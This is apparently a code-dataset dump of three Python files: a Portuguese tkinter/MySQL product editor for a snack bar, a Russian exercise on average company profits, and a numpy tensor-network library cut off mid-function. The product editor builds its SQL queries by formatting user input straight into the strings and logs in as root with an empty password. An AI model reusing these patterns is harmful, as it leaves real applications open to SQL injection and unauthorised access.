='{}', pre_venda_produto = {}, pre_custo_produto = {}, estoque = {} where cod_produto ={}\".format(ean,nome, comboboxcat.get(),entryUnidade.get(),entrydescrição.get(\"1.0\",END),prevenda,precusto,estoque,cod)\n print(sqlupdate)\n mycursor.execute(sqlupdate)\n\n mycursor.close()\n connection.commit()\n connection.close() \n\n\n connection = pymysql.connect(host=\"localhost\",user=\"root\",password=\"\",database=\"bdlanchonete\")\n mycursor = connection.cursor()\n\n codProd = str(cod_entry.get()) \n\n sqlPesquisar = \"SELECT * FROM produtos where cod_produto= {}\".format(codProd)\n mycursor.execute(sqlPesquisar)\n\n for produto in mycursor:\n print(produto)\n\n window = gui.Tk()\n window.title(\"Lanchonete | Editar Produtos\")\n window.iconbitmap(\"imagens/ico.lanchonete.ico\")\n window.geometry(\"770x300\") # WxH\n window.resizable(False,False)\n window.configure(bg=\"#DCDCDC\")\n\n #=================notebook========================\n # mynot = ttk.Notebook(window, width= 710, height=450) # criando notebook\n # mynot.pack(pady=65)\n\n # ------------Frames----------------------------------\n \n #=================labels e entrys========================\n # lblanchonetename = Label(window, text=\"Sistema Lanchonete\", bg=\"#DCDCDC\", fg=\"#363636\", bd=0.01, font=\"Broadway 35 bold\")\n # lblanchonetename.place(x=100, y=0)\n #codigo\n labelcod = gui.Label(window,text=\"Cód. Produto:\", font=\"Britannic 10 bold\")\n labelcod.grid(row=0,column=0,sticky=W) # sticky -> para ficar um pouco mais para o oeste\n\n \n entrycod = gui.Entry(window, width=35, bd=4)# state=\"disabled\")\n entrycod.grid(row=0, column=1,padx=5,pady=3,ipady=3) # ipady -> para altura do entry | padxe pady -> espaço ao redor\n \n #EAN\n labelean = gui.Label(window,text=\"EAN/GTIN:\",font=\"Britannic 10 bold\")\n labelean.grid(row=1,column=0,sticky=W)\n\n entryean = gui.Entry(window, width=35, bd=4)\n entryean.grid(row=1, column=1,padx=5,pady=3,ipady=3)\n #nome\n labelnome = gui.Label(window,text=\"Nome:\",font=\"Britannic 10 bold\")\n labelnome.grid(row=2,column=0,sticky=W)\n\n entrynome = gui.Entry(window, width=35, bd=4)\n entrynome.grid(row=2, column=1,padx=5,pady=3,ipady=3)\n #categoria\n labelcat = gui.Label(window,text=\"Categoria:\",font=\"Britannic 10 bold\")\n labelcat.grid(row=3,column=0,sticky=W)\n\n comboboxcat = ttk.Combobox(window, width=33, values=\"Lanches Salgados Doces Bebidas\", state=\"readonly\") # adicionando um Combobox\n #comboboxcat.set(\"Selecione\") # o combobox inicia vazio se não for selecionado uma opção para ele iniciar | para fazer isso usa-se o .set\n comboboxcat.grid(row=3, column=1,padx=5,pady=3,ipady=3)\n\n #Unidade\n labelUnidade = gui.Label(window,text=\"Unidade:\", bg=\"#C0C0C0\", font=\"Britannic 10 bold\")\n labelUnidade.grid(row=3,column=2,sticky=W)\n\n entryUnidade = gui.Entry(window, width=10, bd=4)\n entryUnidade.grid(row=3, column=3,padx=5,pady=3,ipady=3,sticky=W)\n #preço de venda\n labelprevenda = gui.Label(window,text=\"Preço de venda:\", font=\"Britannic 10 bold\")\n labelprevenda.grid(row=0,column=2,sticky=W)\n\n entryprevenda = gui.Entry(window, width=35, bd=4)\n entryprevenda.grid(row=0, column=3,padx=5,pady=3,ipady=3)\n #preço de custo\n labelprecusto = gui.Label(window,text=\"Preço de custo:\", font=\"Britannic 10 bold\")\n labelprecusto.grid(row=1,column=2,sticky=W)\n\n entryprecusto = gui.Entry(window, width=35, bd=4)\n entryprecusto.grid(row=1, column=3,padx=5,pady=3,ipady=3)\n #estoque\n labelestoque = gui.Label(window,text=\"Estoque atual:\", font=\"Britannic 10 bold\")\n labelestoque.grid(row=2,column=2,sticky=W)\n\n entryestoque = gui.Entry(window, width=35, bd=4)\n entryestoque.grid(row=2, column=3,padx=5,pady=3,ipady=3)\n #descrição\n labeldescrição = gui.Label(window,text=\"Descrição:\", font=\"Britannic 10 bold\")\n labeldescrição.grid(row=4,column=0,sticky=W)\n\n entrydescrição = gui.Text(window, width=28, height=5, bd=4)\n entrydescrição.grid(row=4, column=1,padx=5,pady=3,ipady=3)\n\n btSalvar = gui.Button(window,text=\"Salvar\", fg=\"green\", bg=\"#C0C0C0\", padx=20, pady=2, borderwidth=5, command=UpdateProdutos)\n btSalvar.grid(row=6, column=4,pady=8)\n\n entrycod.insert(0,produto[0])\n # entrycod.insert(0, \"Automático\")\n entrycod[\"state\"] =\"disabled\" # desativar o entry\n entryean.insert(0,produto[1])\n entrynome.insert(0,produto[2])\n comboboxcat.set(produto[3])\n entryUnidade.insert(0,produto[4])\n entrydescrição.insert(END,produto[5],'')\n entryprevenda.insert(0,produto[6])\n entryprecusto.insert(0,produto[7])\n entryestoque.insert(0,produto[8])\n \n\n\n\n\n\n\n\n # ------------Opening Window----------------------------------\n window = gui.Tk()\n window.title(\"Lanchonete | Produtos\")\n window.iconbitmap(\"imagens/ico.lanchonete.ico\")\n window.geometry(\"750x500\") # WxH\n window.resizable(False,False)\n window.configure(bg=\"#DCDCDC\")\n\n #=================notebook========================\n mynot = ttk.Notebook(window, width= 710, height=450) # criando notebook\n mynot.pack(pady=65)\n\n # ------------Frames----------------------------------\n frame1 = gui.Frame(mynot,background=\"#C0C0C0\", highlightbackground=\"#ffffff\", highlightthickness=3)\n frame1.place(relwidth=0.80,relheight=0.73,relx=0.1,rely=0.15)\n mynot.add(frame1, text=\"Cadastrar produtos\") # adicionando frame no notebook\n\n frame2 = gui.Frame(mynot,background=\"#C0C0C0\", highlightbackground=\"#ffffff\", highlightthickness=3)\n frame2.place(relwidth=0.80,relheight=0.73,relx=0.1,rely=0.15)\n mynot.add(frame2, text=\"Visualisar produtos\")\n\n frame3 = gui.Frame(mynot,background=\"#C0C0C0\", highlightbackground=\"#ffffff\", highlightthickness=3)\n frame3.place(relwidth=0.80,relheight=0.73,relx=0.1,rely=0.15)\n mynot.add(frame3, text=\"Excluir/Editar produtos\")\n\n #=================labels e entrys========================\n lblanchonetename = Label(window, text=\"Sistema Lanchonete\", bg=\"#DCDCDC\", fg=\"#363636\", bd=0.01, font=\"Broadway 35 bold\")\n lblanchonetename.place(x=100, y=0)\n #codigo\n labelcod = gui.Label(frame1,text=\"Cód. Produto:\", bg=\"#C0C0C0\", font=\"Britannic 10 bold\")\n labelcod.grid(row=0,column=0,sticky=W) # sticky -> para ficar um pouco mais para o oeste\n\n entrycod = gui.Entry(frame1, width=35, bd=4)# state=\"disabled\"\n entrycod.grid(row=0, column=1,padx=5,pady=3,ipady=3) # ipady -> para altura do entry | padxe pady -> espaço ao redor\n # entrycod.insert(0,teste[0]+1)\n entrycod.insert(0, \"Automático\") # inserindo valor no entry\n entrycod[\"state\"] =\"disabled\" # desativar o entry\n #EAN\n labelean = gui.Label(frame1,text=\"EAN/GTIN:\", bg=\"#C0C0C0\", font=\"Britannic 10 bold\")\n labelean.grid(row=1,column=0,sticky=W)\n\n entryean = gui.Entry(frame1, width=35, bd=4)\n entryean.grid(row=1, column=1,padx=5,pady=3,ipady=3)\n #nome\n labelnome = gui.Label(frame1,text=\"Nome:\", bg=\"#C0C0C0\", font=\"Britannic 10 bold\")\n labelnome.grid(row=2,column=0,sticky=W)\n\n entrynome = gui.Entry(frame1, width=35, bd=4)\n entrynome.grid(row=2, column=1,padx=5,pady=3,ipady=3)\n #categoria\n labelcat = gui.Label(frame1,text=\"Categoria:\", bg=\"#C0C0C0\", font=\"Britannic 10 bold\")\n labelcat.grid(row=3,column=0,sticky=W)\n\n comboboxcat = ttk.Combobox(frame1, width=33, values=\"Lanches Salgados Doces Bebidas\", state=\"readonly\") # adicionando um Combobox\n comboboxcat.set(\"Selecione\") # o combobox inicia vazio se não for selecionado uma opção para ele iniciar | para fazer isso usa-se o .set\n comboboxcat.grid(row=3, column=1,padx=5,pady=3,ipady=3)\n\n #Unidade\n labelUnidade = gui.Label(frame1,text=\"Unidade:\", bg=\"#C0C0C0\", font=\"Britannic 10 bold\")\n labelUnidade.grid(row=3,column=2,sticky=W)\n\n entryUnidade = gui.Entry(frame1, width=10, bd=4)\n entryUnidade.grid(row=3, column=3,padx=5,pady=3,ipady=3,sticky=W)\n\n\n #preço de venda\n labelprevenda = gui.Label(frame1,text=\"Preço de venda:\", bg=\"#C0C0C0\", font=\"Britannic 10 bold\")\n labelprevenda.grid(row=0,column=2,sticky=W)\n\n entryprevenda = gui.Entry(frame1, width=35, bd=4)\n entryprevenda.grid(row=0, column=3,padx=5,pady=3,ipady=3)\n #preço de custo\n labelprecusto = gui.Label(frame1,text=\"Preço de custo:\", bg=\"#C0C0C0\", font=\"Britannic 10 bold\")\n labelprecusto.grid(row=1,column=2,sticky=W)\n\n entryprecusto = gui.Entry(frame1, width=35, bd=4)\n entryprecusto.grid(row=1, column=3,padx=5,pady=3,ipady=3)\n #estoque\n labelestoque = gui.Label(frame1,text=\"Estoque atual:\", bg=\"#C0C0C0\", font=\"Britannic 10 bold\")\n labelestoque.grid(row=2,column=2,sticky=W)\n\n entryestoque = gui.Entry(frame1, width=35, bd=4)\n entryestoque.grid(row=2, column=3,padx=5,pady=3,ipady=3)\n #descrição\n labeldescrição = gui.Label(frame1,text=\"Descrição:\", bg=\"#C0C0C0\", font=\"Britannic 10 bold\")\n labeldescrição.grid(row=4,column=0,sticky=W)\n\n entrydescrição = gui.Text(frame1, width=28, height=5, bd=4)\n entrydescrição.grid(row=4, column=1,padx=5,pady=3,ipady=3)\n\n codexcluir = Label(frame3,text=\"Cod. do produto:\", bg=\"#C0C0C0\", font=\"Britannic 10 bold\")\n codexcluir.grid(row=2,column=0, pady=20, padx=10)\n \n cod_entry = Entry(frame3, width=35, bd=4)\n cod_entry.grid(row=2,column=1,ipady=3)\n\n #=================botões==================================\n btcliente = gui.Button(frame1,text=\"Sair\", fg=\"red\", bg=\"#C0C0C0\", width= 10, padx=20, pady=2, borderwidth=5)\n btcliente.place(x=10,y=300)\n\n btfuncionario = gui.Button(frame1,text=\"Cadastrar\", fg=\"green\", bg=\"#C0C0C0\", width= 10, padx=20, pady=2, borderwidth=5, command=CadastrarProdutos)\n btfuncionario.place(x=145,y=300)\n\n btfuncionarioo = gui.Button(frame2,text=\"Visualizar\", fg=\"green\", bg=\"#C0C0C0\", width= 10, padx=20, pady=2, borderwidth=5, command=VisualisarProddutos)\n btfuncionarioo.place(x=90,y=300)\n\n excluirprod = Button(frame3,text=\"Excluir\",bg=\"#C0C0C0\", width= 10, padx=20, pady=2, borderwidth=5,command=ExcluirProdutos)\n excluirprod.grid(row=3,column=0,rowspan=2,columnspan=4,padx=20,pady=(0,20))\n \n editarprod = Button(frame3,text=\"Editar\", bg=\"#C0C0C0\", width= 10, padx=22, pady=2, borderwidth=5,command=EditarProdutos)\n editarprod.grid(row=5,column=0,rowspan=2,columnspan=4)\n\n #=================treeview==================================\n treeviewproduto = ttk.Treeview(frame2,columns=('id','ean','nome','cat','desc', 'precovenda','precusto', 'estq'),show='headings')\n treeviewproduto.column('id',minwidth=0,width=65)\n treeviewproduto.column('ean',minwidth=0,width=70)\n treeviewproduto.column('nome',minwidth=0,width=75)\n treeviewproduto.column('cat',minwidth=0,width=65)\n treeviewproduto.column('precovenda',minwidth=0,width=60)\n treeviewproduto.column('precusto',minwidth=0,width=60)\n treeviewproduto.column('estq',minwidth=0,width=60)\n treeviewproduto.column('desc',minwidth=0,width=200)\n\n treeviewproduto.heading('id',text=\"Cód. Prod \")\n treeviewproduto.heading('ean',text=\"EAN/GTIN \")\n treeviewproduto.heading('nome',text=\"Nome \")\n treeviewproduto.heading('cat',text=\"Categ. \")\n treeviewproduto.heading('precovenda',text=\"Pr. Venda \")\n treeviewproduto.heading('precusto',text=\"Pr. Custo \")\n treeviewproduto.heading('estq',text=\"Estoque \")\n treeviewproduto.heading('desc',text=\"Descriçao \")\n treeviewproduto.pack()\n\n # ------------Loop End----------------------------------\n window.mainloop()\n","sub_path":"produtos.py","file_name":"produtos.py","file_ext":"py","file_size_in_byte":16580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"481047667","text":"\"\"\"\n1.\tПользователь вводит данные о количестве предприятий, их наименования и прибыль\nза 4 квартала (т.е. 4 отдельных числа) для каждого предприятия.\nПрограмма должна определить среднюю прибыль (за год для всех предприятий)\nи вывести наименования предприятий, чья прибыль выше среднего и отдельно\nвывести наименования предприятий, чья прибыль ниже среднего.\n\nПодсказка:\nДля решения задачи обязательно примените какую-нибудь коллекцию из модуля collections\nДля лучшее освоения материала можете даже сделать несколько решений этого задания,\nприменив несколько коллекций из модуля collections\n\nПример:\nВведите количество предприятий для расчета прибыли: 2\nВведите название предприятия: Рога\nчерез пробел введите прибыль данного предприятия\nза каждый квартал(Всего 4 квартала): 235 345634 55 235\n\nВведите название предприятия: Копыта\nчерез пробел введите прибыль данного предприятия\nза каждый квартал(Всего 4 квартала): 345 34 543 34\n\nСредняя годовая прибыль всех предприятий: 173557.5\nПредприятия, с прибылью выше среднего значения: Рога\n\nПредприятия, с прибылью ниже среднего значения: Копыта\n\"\"\"\n\nfrom collections import namedtuple\n\nORG = namedtuple('Organization', 'name profit')\n\n\ndef init_orgs():\n orgs = []\n count = int(input('Введите количество предприятий для расчета прибыли:'))\n while count > 0:\n name = input('Введите название предприятия:')\n profits = input('через пробел введите прибыль данного предприятия\\nза каждый квартал(Всего 4 квартала):')\n profits_nums = [int(n) for n in profits.split()]\n orgs.append(ORG(name=name, profit=sum(profits_nums)))\n count -= 1\n return orgs\n\n\ndef get_avg_profit(orgs):\n if len(orgs) == 0:\n return 0\n profit_sum = 0\n for org in orgs:\n profit_sum += org.profit\n return profit_sum / len(orgs)\n\n\ndef analize(orgs):\n avg_profit = get_avg_profit(orgs)\n print(f'Cредняя годовая прибыль всех предприятий: {avg_profit}')\n greater = []\n lower = []\n for org in orgs:\n if org.profit > avg_profit:\n greater.append(org.name)\n elif org.profit < avg_profit:\n lower.append(org.name)\n print(f'Предприятия, с прибылью выше среднего значения: {\"\".join(greater)}')\n print(f'Предприятия, с прибылью ниже среднего значения: {\"\".join(lower)}')\n\n\norganizations = init_orgs()\nanalize(organizations)\n","sub_path":"lesson5/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":3456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"128957175","text":"import numpy as np\r\nimport pdb\r\nfrom scipy import linalg\r\nimport copy\r\n\r\nepsilon = 1e-10\r\n\r\n#(...(ab)...) --> (...ab...) a and b are now different axes, though adjacent to each other\r\ndef split_axes(M, i, m, n):\r\n\t\r\n\tassert M.shape[i] == m * n\r\n\t\r\n\tM_spl = np.array( np.split(M, n, axis = i) )\r\n\tM_spl = np.moveaxis(M_spl, 0, i + 1)\r\n\t\r\n\treturn M_spl\r\n\t\r\n#(...a...b...) --> (...(ab)...) Index ab in place where a used to be\r\ndef merge_axes(M, i, j):\r\n\t\r\n\tM_mer = np.moveaxis(M, j, 0)\r\n\tif i > j:\r\n\t\tM_mer = np.concatenate(M_mer, axis = i - 1)\r\n\telse:\r\n\t\tM_mer = np.concatenate(M_mer, axis = i)\r\n\t\t\t\r\n\treturn M_mer\r\n\t\r\ndef matr_tensor(A, B):\r\n\tAB = np.einsum('ij,kl->ikjl', A, B)\r\n\tAB = merge_axes(AB, 0, 1)\r\n\tAB = merge_axes(AB, 1, 2)\r\n\treturn AB\r\n\r\n\r\ndef apply_double_gate(U, gamma1, lmbda, gamma2, alpha, eta):\r\n\t\r\n\tbond_dim = lmbda.shape[0]\r\n\tsite_dim = gamma1.shape[2]\r\n\r\n\t#In fact alpha and eta should be real, but just in case...\r\n\talpha_conj = np.conj(alpha)\r\n\teta_conj = np.conj(eta)\r\n\t\r\n\teta_sq = eta * eta_conj\r\n\talpha_sq = alpha * alpha_conj\r\n\t\r\n\t#Apply gate\r\n\tTheta = np.einsum('klij, abk, b, byl->ayij', U, gamma1, lmbda, gamma2, dtype = np.complex_)\r\n\t\r\n\tTheta_conj = np.conj(Theta)\t\r\n\t\r\n\t#Matrix is converted to form mutliplied by etas at this point, must be de-converted later\r\n\trho_DK = np.einsum('a,ayij,aYiJ,y,Y->yjYJ', alpha_sq, Theta, Theta_conj, eta, eta_conj, dtype = np.complex_)\r\n\t\r\n\trho_DK_sq = merge_axes(rho_DK, 0, 1)\r\n\trho_DK_sq = merge_axes(rho_DK_sq, 1, 2)\r\n\t\r\n\trho_DK_eigenval, rho_DK_eigenvec = linalg.eig(rho_DK_sq)\r\n\t\r\n\trho_DK_eigenvec = [ rho_DK_eigenvec[:,k] for k in range(len(rho_DK_eigenvec))]\r\n\t\r\n\t\r\n\trho_DK_reconstructed = np.zeros(rho_DK_sq.shape, dtype = np.complex_)\r\n\tfor k in range(len(rho_DK_eigenval)):\r\n\t\teigenvec_matr = np.einsum('a,b->ab', rho_DK_eigenvec[k], np.conj(rho_DK_eigenvec[k]))\r\n\t\trho_DK_reconstructed += rho_DK_eigenval[k] * eigenvec_matr\r\n\t\r\n\t\r\n\teigenlist = [ (rho_DK_eigenval[k], rho_DK_eigenvec[k]) for k in range(len(rho_DK_eigenval))]\r\n\t\r\n\teigenlist.sort(key = lambda x: -np.abs(x[0]))\r\n\t\r\n\t\r\n\tnew_gamma1 = np.zeros(gamma1.shape, dtype = np.complex_)\r\n\tnew_gamma2 = np.zeros(gamma2.shape, dtype = np.complex_)\r\n\tnew_lmbda = np.zeros(lmbda.shape, dtype = np.complex_)\r\n\t\r\n\t#obtain updated gamma2\r\n\tfor k in range(bond_dim):\r\n\t\tvec = split_axes(eigenlist[k][1], 0, bond_dim, site_dim)\r\n\t\tnew_gamma2[k] = vec\r\n\t\r\n\t#Set tiny values to zero(I think these are mostly numerical inaccuracies...?...need to think about this more...)\r\n\tfor x in np.nditer(new_gamma2, op_flags = ['readwrite']):\r\n\t\tif np.abs(x) < epsilon:\r\n\t\t\tx[...] = 0\r\n\t\r\n\t\r\n\tfor k in range(bond_dim):\r\n\t\tif np.abs(eta[k]) > 1e-12:\r\n\t\t\tnew_gamma2[:,k] = new_gamma2[:,k] / eta[k]\r\n\t\telse:\r\n\t\t\tnew_gamma2[:,k] = np.zeros(new_gamma2[:,k].shape)\r\n\t\r\n\r\n\tfor k in range(bond_dim):\r\n\t\t\r\n\t\trow = np.einsum('yj,ayij,y->ai', np.conj(new_gamma2)[k], Theta, eta_sq, dtype = np.complex)\r\n\t\t\r\n\t\t#row = new_gamma1[:,k,:]\r\n\t\trow_length = np.abs(np.sqrt(np.einsum('aj,aj,a->',row, np.conj(row), alpha_sq)))\r\n\t\t\r\n\t\tnew_lmbda[k] = row_length\r\n\t\t\r\n\t\tif new_lmbda[k] < 1e-12:\r\n\t\t\tnew_lmbda[k] = 0\r\n\t\t\tnew_gamma2[k] = np.zeros(new_gamma2[k].shape)\r\n\t\t\tnew_gamma1[:,k,:] = np.zeros(new_gamma1[:,k,:].shape)\r\n\t\telse:\r\n\t\t\tnew_gamma1[:,k,:] = row / new_lmbda[k]\r\n\t\r\n\tfor x in np.nditer(new_gamma1, op_flags = ['readwrite']):\r\n\t\tif np.abs(x) < epsilon:\r\n\t\t\tx[...] = 0\r\n\t\r\n\t#Normalize\r\n\tnew_gamma1 = new_gamma1 * np.sqrt(np.sum(new_lmbda**2))\r\n\tnew_lmbda = new_lmbda / np.sqrt(np.sum(new_lmbda**2))\r\n\t\r\n\treturn new_gamma1, new_lmbda, new_gamma2\r\n\r\n\r\ndef apply_single_gate(U,gamma):\r\n\treturn np.einsum('abi,ij->abj', gamma,U)\r\n\t\r\n#Local measurement at gamma\r\ndef measurement(M, gamma, alpha, eta):\r\n\t\r\n\talpha_conj = np.conj(alpha)\r\n\talpha_sq = alpha * alpha_conj\r\n\t\r\n\teta_conj = np.conj(eta)\r\n\teta_sq = eta * eta_conj\r\n\t\r\n\texpec = np.einsum('ayi,ayj,a,y,ij->', np.conj(gamma), gamma, alpha_sq, eta_sq, M)\r\n\treturn np.abs(expec) #This should be real anyway\r\n\t\r\n\r\n#Local projection at a site, and normalization. Note that this will \r\n#mess up the left and right Schmidt decompositions, and these will have to be\r\n#updated.\r\ndef project(P, alpha, gamma, eta):\r\n\t\r\n\talpha_sq = alpha * np.conj(alpha)\r\n\teta_sq = eta * np.conj(eta)\r\n\t\r\n\tnew_gamma = np.einsum('ij,ayj->ayi', P, gamma)\r\n\t\r\n\t\r\n\tnew_gamma_norm = np.einsum('ayi,ayi,a,y->', new_gamma, np.conj(new_gamma), alpha_sq, eta_sq)\r\n\t\t\r\n\tif new_gamma_norm < 1e-12:\r\n\t\tnew_gamma = np.zeros(new_gamma.shape)\r\n\telse:\t\r\n\t\tnew_gamma = new_gamma / np.sqrt(new_gamma_norm)\r\n\r\n\t\r\n\treturn new_gamma\r\n\t\r\n#Updates the Schimidt decomposition. \r\n#That is, we will 'fix' gamma2's left Schmidt decomp. \r\ndef update_schmidt_left(gamma1, alpha, gamma2, eta):\r\n\t\r\n\tbond_dim = gamma1.shape[0]\r\n\tsite_dim = gamma1.shape[2]\r\n\t\r\n\t#Incorporate the lmbdas into the entries of gamma1\r\n\tgamma_actual = np.einsum('a,y,ayi->ayi', alpha, eta, gamma2)\r\n\t#Now we can treat alpha and eta as orthnormal basis for left and right of our site\r\n\t\r\n\tgamma_matrix = merge_axes(gamma_actual, 1, 2)\r\n\t\r\n\tU, S, V = np.linalg.svd(gamma_matrix)\r\n\t\r\n\tnew_gamma1 = np.zeros(gamma1.shape, dtype = np.complex_)\r\n\tnew_alpha = np.zeros(eta.shape, dtype = np.complex_)\r\n\tnew_gamma2 = np.zeros(gamma2.shape, dtype = np.complex_)\r\n\t\r\n\tnew_alpha = S[:bond_dim]\r\n\t\r\n\tfor k in range(bond_dim):\r\n\t\tnew_gamma2[k] = split_axes(V[k], 0, bond_dim, site_dim)\r\n\t#I don't think that I need to 're-incorporate' size of new_alpha's, \r\n\t#I believe that the svd does that for me\r\n\t\r\n\t#Re-incorporate size of eta's\r\n\tfor k in range(bond_dim):\r\n\t\tif np.abs(eta[k]) < 1e-12:\r\n\t\t\tnew_gamma2[:,k] = np.zeros(new_gamma2[:,k].shape)\r\n\t\telse:\r\n\t\t\tnew_gamma2[:,k] = new_gamma2[:,k] / eta[k]\r\n\t\r\n\t#V interpreted as matrix of new basis coefficients for gamma2 \r\n\tnew_gamma1 = np.einsum('ik,aij->akj', U, gamma1)\r\n\t\r\n\t#kill off rows/columns attached to tiny lambda values\r\n\t#These shouldn't be a problem anyway, but they annoy me and \r\n\t#seems like they could mess up things in some subtle way later\r\n\tfor k in range(bond_dim):\r\n\t\tif np.abs(new_alpha[k]) < 1e-12:\r\n\t\t\tnew_alpha[k] = 0\r\n\t\t\tnew_gamma2[k] = np.zeros(new_gamma2[k].shape)\r\n\t\t\tnew_gamma1[:,k] = np.zeros(new_gamma1[:,k].shape)\r\n\t\r\n\treturn new_gamma1, new_alpha, new_gamma2\r\n\r\n#Fixes gamma1's right Schmidt decomposition\r\ndef update_schmidt_right(alpha, gamma1, eta, gamma2):\r\n\t\r\n\tbond_dim = gamma1.shape[0]\r\n\tsite_dim = gamma1.shape[2]\r\n\t\r\n\t#Incorporate the lmbdas into the entries of gamma1\r\n\tgamma_actual = np.einsum('a,y,ayi->ayi', alpha, eta, gamma1)\r\n\t#Now we can treat alpha and eta as orthnormal basis for left and right of our site\r\n\t\r\n\tgamma_matrix = merge_axes(gamma_actual, 0, 2)\r\n\t\r\n\tU, S, V = np.linalg.svd(gamma_matrix)\r\n\t\r\n\tnew_gamma1 = np.zeros(gamma1.shape, dtype = np.complex_)\r\n\tnew_eta = np.zeros(eta.shape, dtype = np.complex_)\r\n\tnew_gamma2 = np.zeros(gamma2.shape, dtype = np.complex_)\r\n\t\r\n\tnew_eta = S[:bond_dim]\r\n\t\r\n\tfor k in range(bond_dim):\r\n\t\tnew_gamma1[:,k] = split_axes(U[:,k], 0, bond_dim, site_dim)\r\n\t#I don't think that I need to 're-incorporate' size of new_eta's, \r\n\t#I believe that the svd does that for me\r\n\t\r\n\t#Re-incorporate size of alpha's\r\n\tfor k in range(bond_dim):\r\n\t\tif np.abs(alpha[k]) < 1e-12:\r\n\t\t\tnew_gamma1[k] = np.zeros(new_gamma1[k].shape)\r\n\t\telse:\r\n\t\t\tnew_gamma1[k] = new_gamma1[k] / alpha[k]\r\n\t\r\n\t#V interpreted as matrix of new basis coefficients for gamma2 \r\n\tnew_gamma2 = np.einsum('ki,iyj->kyj', V, gamma2)\r\n\t\r\n\t#kill off rows/columns attached to tiny lambda values\r\n\t#These shouldn't be a problem anyway, but they annoy me and \r\n\t#seems like they could mess up things in some subtle way later\r\n\tfor k in range(bond_dim):\r\n\t\tif np.abs(new_eta[k]) < 1e-12:\r\n\t\t\tnew_eta[k] = 0\r\n\t\t\tnew_gamma1[:,k] = np.zeros(new_gamma1[:,k].shape)\r\n\t\t\tnew_gamma2[k] = np.zeros(new_gamma2[k].shape)\r\n\t\r\n\treturn new_gamma1, new_eta, new_gamma2\r\n\t\r\n#Locally projects at site i using projector P, then updates the Schmidt decompositions\r\n#to the left and right.\r\ndef project_and_update(gamma_list, lmbda_list, P, i):\r\n\r\n\tL = len(gamma_list)\r\n\t\r\n\tgamma_list[i] = project(P, lmbda_list[i - 1], gamma_list[i], lmbda_list[i])\r\n\t\r\n\t#Update left Schmidt decompositions\r\n\t\r\n\tfor k in range(i - 1, -1, -1): \r\n\t\tgamma_list[k], lmbda_list[k], gamma_list[k + 1] = \\\r\n\t\t\tupdate_schmidt_left(gamma_list[k], lmbda_list[k], gamma_list[k + 1], lmbda_list[k + 1])\r\n\t\t\r\n\t#Right schmidt decompositions\r\n\tfor k in range(i, L - 1):\r\n\t\tgamma_list[k], lmbda_list[k], gamma_list[k + 1] = \\\r\n\t\t\tupdate_schmidt_right( lmbda_list[k - 1], gamma_list[k], lmbda_list[k], gamma_list[k + 1])\r\n\t\r\n\t\r\n\treturn gamma_list, lmbda_list\r\n\t\r\n#############################################\r\n############### BETA FORMAT #################\r\n#############################################\r\n\r\n#Convert to beta form, useful for iterating applying double gates.\r\ndef convert_to_beta(gamma_list, lmbda_list):\r\n\t\r\n\tbeta_list = [ np.einsum('abi,b->abi', gamma_list[k], lmbda_list[k]) for k in range(len(gamma_list)) ]\r\n\t\r\n\treturn beta_list, lmbda_list\r\n\t\r\ndef convert_from_beta(beta_list, lmbda_list):\r\n\t\r\n\tbond_dim = beta_list[0].shape[0]\r\n\t\r\n\tgamma = [np.zeros(beta_list[i].shape, dtype = np.complex_) for i in range(len(beta_list))]\r\n\tlmbda = [np.zeros(lmbda_list[i].shape, dtype = np.complex_) for i in range(len(beta_list))]\r\n\t\r\n\tfor i in range(len(beta_list)):\r\n\t\tfor k in range(bond_dim):\r\n\t\t\tif np.abs(lmbda_list[i][k]) < 1e-12:\r\n\t\t\t\t#leave gamma_list[i][:,k] as zeros\r\n\t\t\t\tlmbda[i][k] = 0\r\n\t\t\telse:\r\n\t\t\t\tlmbda[i][k] = lmbda_list[i][k]\r\n\t\t\t\tgamma[i][:,k] = beta_list[i][:,k] / lmbda[i][k]\r\n\t\r\n\treturn gamma, lmbda\r\n\r\n\r\n#Apply the gate U to sites at beta1 and beta2. Iterating this transformation leads\r\n#to greater numerical stability because there is no division by small singular values\r\ndef apply_double_gate_beta(U, alpha, beta1, beta2):\r\n\t\r\n\tbond_dim = beta1.shape[0]\r\n\tsite_dim = beta1.shape[2]\r\n\t\r\n\tPsi = np.einsum('abi,byj->ayij', beta1, beta2)\r\n\t\r\n\tTheta = np.einsum('ayij,ijkl->aykl', Psi, U)\r\n\t\r\n\tTheta_alpha = np.einsum('a,aykl->aykl', alpha, Theta)\r\n\t\r\n\tTheta_matrix = merge_axes(Theta_alpha, 0,2)\r\n\tTheta_matrix = merge_axes(Theta_matrix, 1,2)\r\n\t\r\n\tU, S, V = np.linalg.svd(Theta_matrix)\r\n\t\r\n\tnew_beta2 = split_axes(V, 1, bond_dim, site_dim)[:bond_dim] \r\n\t\r\n\tlmbda = S[:bond_dim]\r\n\t\r\n\tnew_beta1 = np.einsum('ayij,kyj->aki', Theta, np.conj(new_beta2))\r\n\t\r\n\treturn new_beta1, lmbda, new_beta2\r\n\r\n\r\ndef apply_single_gate_beta(U, beta1):\r\n\r\n\r\n\r\n\treturn np.einsum('ayi,ij->ayj', beta1, U)\r\n\t\r\n\t\r\n\t\r\n###################################################\r\n############# BRANCH DECOMPOSITION ###############\r\n###################################################\r\n\r\n\r\n#Given a set of square matrices M, outputs a matrix P such that \r\n#P M P* is in finest block-diagonal decomposition.\r\n#This algorithm from the paper by Maehara and Murota\r\ndef block_diagonal_square_matrices(M, epsilon = 1e-5):\r\n\t\r\n\t#Our M is a 3-tensor representing multiple square matrices we wish \r\n\t#to diagonalize, M(i,j,a), where (i,j) are oredinary indices and \r\n\t#a indexes different matrices.\r\n\t\r\n\t#Construct the matrices T(i,j)(k,l)\r\n\t\r\n\tS = np.zeros((M.shape[0], M.shape[0], M.shape[0], M.shape[0]), dtype = np.complex_)\r\n\t\r\n\tI = np.identity(M.shape[0])\r\n\t\r\n\t#This is somewhat stupid and numerically inaccurate,\r\n\t#probably should update at some point....\r\n\tfor a in range(M.shape[2]):\r\n\t\tT = np.zeros((M.shape[0], M.shape[0], M.shape[0], M.shape[0]), dtype = np.complex_)\r\n\t\t\r\n\t\tT += np.einsum('qj,ip->ijpq', I, M[:,:,a])\r\n\t\tT -= np.einsum('pi,qj->ijpq', I, M[:,:,a])\r\n\t\t\r\n\t\tT_norm = np.einsum('ijpq, klpq->ijkl', T, np.conj(T))\r\n\t\t\r\n\t\tT_prime = np.zeros((M.shape[0], M.shape[0], 